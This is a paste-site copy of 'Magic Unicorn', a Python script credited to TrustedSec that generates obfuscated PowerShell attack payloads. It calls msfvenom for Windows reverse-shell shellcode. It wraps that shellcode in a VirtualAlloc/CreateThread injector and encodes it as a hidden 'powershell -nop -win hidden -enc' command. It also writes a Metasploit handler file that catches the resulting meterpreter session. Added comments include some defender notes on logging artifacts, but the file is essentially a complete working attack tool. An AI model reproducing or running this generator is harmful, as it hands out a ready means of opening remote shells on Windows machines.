Sh3lLDu5T

Unicorn-Powershell-Payload-Generator

Mar 4th, 2015
  1. #!/usr/bin/python
  2. #
  3. # Magic Unicorn - PowerShell downgrade attack tool
  4. #
  5. # Written by: Dave Kennedy (@HackingDave)
  6. # Company: TrustedSec (@TrustedSec) https://www.trustedsec.com
  7. #
  8. # Real quick down and dirty for native x86 powershell on any platform
  9. #
  10. # Usage: python unicorn.py payload reverse_ipaddr port
  11. # Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
  12. #
  13. # Requirements: Need to have Metasploit installed.
  14. #
  15. # Special thanks to Matthew Graeber and Josh Kelley
  16. #
  17. import base64
  18. import re
  19. import subprocess
  20. import sys
  21.  
# generate base shellcode
#
# Shells out to msfvenom and strips the C-array scaffolding from its output so
# that only the "\xNN\xNN..." escape run is left for format_payload.
def generate_shellcode(payload,ipaddr,port):
    """Return the ``\\xNN...`` escape string msfvenom emits for *payload*.

    payload -- Metasploit payload name handed to ``msfvenom -p``
    ipaddr  -- LHOST value
    port    -- LPORT value; a leading ``LPORT=`` is tolerated and removed
    Returns msfvenom's stdout (``-f c`` output, ``-a x86 --platform windows``)
    with ``unsigned char buf[] =``, quotes, ``+``, ``;``, spaces, newlines and
    the ``Found 0 compatible encoders`` notice removed and trailing whitespace
    stripped.  Requires msfvenom on PATH.  Python 2 only: relies on the
    ``reduce`` builtin and ``dict.iteritems``.
    """
    port = port.replace("LPORT=", "")
    # NOTE(review): the command line is assembled by %-interpolation and run
    # with shell=True, so payload/ipaddr/port reach the shell unescaped; an
    # argument list with shell=False would avoid that.
    proc = subprocess.Popen("msfvenom -p %s LHOST=%s LPORT=%s -a x86 --platform windows -f c" % (payload,ipaddr,port), stdout=subprocess.PIPE, shell=True)
    # stdout only -- msfvenom's stderr is not captured, so a failed run just
    # yields an empty string here rather than an exception.
    data = proc.communicate()[0]
    # start to format this a bit to get it ready
    # Each key is replaced by '' in turn.  'unsignedcharbuf[]=' and 'buf=' can
    # only match after ' ' has already been removed, while the
    # 'Found 0 compatible encoders' key can only match before it; Python 2
    # dict iteration order is arbitrary, so which of these actually get
    # stripped depends on hash order -- TODO confirm against real msfvenom output.
    repls = {';' : '', ' ' : '', '+' : '', '"' : '', '\n' : '', 'buf=' : '', 'Found 0 compatible encoders' : '', 'unsignedcharbuf[]=' : ''}
    data = reduce(lambda a, kv: a.replace(*kv), repls.iteritems(), data).rstrip()
    return data
  31.  
def format_payload(payload, ipaddr, port):
    """Build the one-line PowerShell injector for *payload* and write two files.

    Pipeline, all visible below: msfvenom C output -> ``0xNN,0xNN,...`` byte
    list -> PowerShell script that P/Invokes VirtualAlloc/memset/CreateThread
    through ``Add-Type`` -> UTF-16LE + base64 ``-enc`` command line.

    payload, ipaddr, port -- passed through to generate_shellcode and into the
    msfconsole resource file.
    Side effects: writes ``powershell_attack.txt`` (the encoded launcher
    command) and ``unicorn.rc`` (a ``multi/handler`` resource script) to the
    current directory, truncating any existing files, and prints two status
    lines.  Returns None.  Python 2 only (``file()``, ``print`` statements;
    ``base64.b64encode`` returning bytes would also break the ``+`` on
    Python 3).

    Defender notes, taken from the strings generated here: the launcher
    ``powershell -nop -win hidden -noni -enc <base64>``, the inner script's
    ``Add-Type``/``VirtualAlloc``/``CreateThread`` members and the explicit
    ``\\syswow64\\WindowsPowerShell\\v1.0\\powershell`` relaunch on 64-bit hosts
    are the artifacts a command-line or script-block log will show.
    """
    # generate our shellcode first
    # (generate_shellcode already rstrip()s, so this second rstrip is a no-op)
    shellcode = generate_shellcode(payload, ipaddr, port).rstrip()
    # sub in \x for 0x
    # the pattern is the two characters "\\x", i.e. a literal backslash
    # followed by x, so every "\xNN" becomes "0xNN"
    shellcode = re.sub("\\\\x", "0x", shellcode)
    # base counter
    counter = 0
    # count every four characters then trigger floater and write out data
    floater = ""
    # ultimate string
    newdata = ""
    # Re-chunk the flat "0x..0x.." string into comma-separated 4-character
    # tokens ("0xNN,").  Note the loop only flushes on a full group of four;
    # any trailing remainder shorter than that is silently dropped.
    for line in shellcode:
        floater = floater + line
        counter = counter + 1
        if counter == 4:
            newdata = newdata + floater + ","
            floater = ""
            counter = 0

    # heres our shellcode prepped and ready to go
    # drop the trailing comma (slicing an empty string is still harmless)
    shellcode = newdata[:-1]
   
    # one line shellcode injection with native x86 shellcode
    # $1 holds the injector script (Add-Type P/Invoke, VirtualAlloc + memset
    # copy loop, CreateThread, then an endless Start-sleep loop to keep the
    # host alive).  The outer script base64-encodes $1 as UTF-16LE into $gq
    # and relaunches it with "-nop -noni -enc"; on a 64-bit host it explicitly
    # uses the SysWOW64 (32-bit) powershell because the shellcode was built
    # with "-a x86" -- that relaunch is the "downgrade" in the header comment.
    # The %s is the comma-separated 0xNN list, which PowerShell reads as [Byte[]].
    powershell_code = (r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = %s;$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";$cmd = "-nop -noni -enc ";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}""" %  (shellcode))

    # second encoding layer: the whole outer script as UTF-16LE base64 for
    # "-enc"; "-win hidden" hides the window, "-nop" skips profiles, "-noni"
    # is non-interactive
    full_attack = "powershell -nop -win hidden -noni -enc " + base64.b64encode(powershell_code.encode('utf_16_le'))  

    # write out powershell attacks
    # file() is the Python 2 builtin; no with-block, so the handle leaks if
    # write() raises
    filewrite = file("powershell_attack.txt", "w")
    filewrite.write(full_attack)
    filewrite.close()

    # write out rc file
    # msfconsole resource script that starts the matching listener; note the
    # port is written as given (a leading "LPORT=" is only stripped inside
    # generate_shellcode)
    filewrite = file("unicorn.rc", "w")
    filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (payload,ipaddr,port))
    filewrite.close()

    print "[*] Exported powershell output code to powershell_attack.txt."
    print "[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute."
  71.  
# pull the variables needed for usage
#
# Script entry point.  Runs at import time (no __main__ guard): expects three
# positional arguments (payload, LHOST, LPORT) and otherwise prints the banner
# and usage text.
try:

    payload = sys.argv[1]  # Metasploit payload name, e.g. windows/meterpreter/reverse_tcp
    ipaddr = sys.argv[2]   # LHOST
    port = sys.argv[3]     # LPORT ("LPORT=NNN" is also accepted, see generate_shellcode)
    format_payload(payload,ipaddr,port)

# except out of index error
#
# Only a missing argument is meant to land here, but any IndexError raised
# inside format_payload would be caught as well and replaced by the usage
# text.  Every other exception propagates with its traceback.
except IndexError:

    print r"""
                                                        ,/
                                                       //
                                                     ,//
                                         ___   /|   |//
                                     `__/\_ --(/|___/-/
                                  \|\_-\___ __-_`- /-/ \.
                                 |\_-___,-\_____--/_)' ) \
                                  \ -_ /     __ \( `( __`\|
                                  `\__|      |\)\ ) /(/|
          ,._____.,            ',--//-|      \ |  '   /
         /     __. \,          / /,---|       \      /
        / /    _. \ \       `/`_/ _,'        |     |
       |  | ( (  \  |      ,/\'__/'/          |     |
       |  \ \`--, `_/_------______/           \(   )/
       | | \ \_. \,                            \___/\
       | |  \_   \ \                                \
       \ \   \_ \  \  /                             \
        \ \ \._  \__ \_|       |                       \
         \ \___  \     \      |                        \
          \__ \__ \ \_ |       \                        |
          |  \_____ \ ____      |                        |
          | \ \__ ---' .__\    |        |               |
          \ \__ ---   /   )     |        \             /
           \  \____/ / ()(      \         `---_       /|
            \__________/(,--__    \_________.    |    ./ |
              |     \ \ `---_\--,           \  \_,./   |
              |      \ \_ ` \   /`---_______-\  \\    /
               \     \.___,`|   /              \  \\   \
                \    |  \_ \|   \             (   |:    |
                 \   \     \   |             /  / |    ;
                  \   \     \   \         ( `_'   \ |
                   \.   \     \.   \         `__/   |  |
                     \  \      \.  \               |  |
                      \  \       \ \              (  )
                       \  |        \ |              |  |
                        |  \        \ \             I  `
                        ( __;        ( _;            ('-_';
                        |___\       \___:            \___:
"""
    print "--------------------Magic Unicorn Attack Vector\n\n-----------------------------"
    print "Real quick down and dirty for native x86 powershell on any platform"
    print "Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)"
    print "Twitter: @TrustedSec, @HackingDave"
    print "Happy Magic Unicorns."
    print "\n"
    print "Usage: python unicorn.py payload reverse_ipaddr port"
    print "Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443"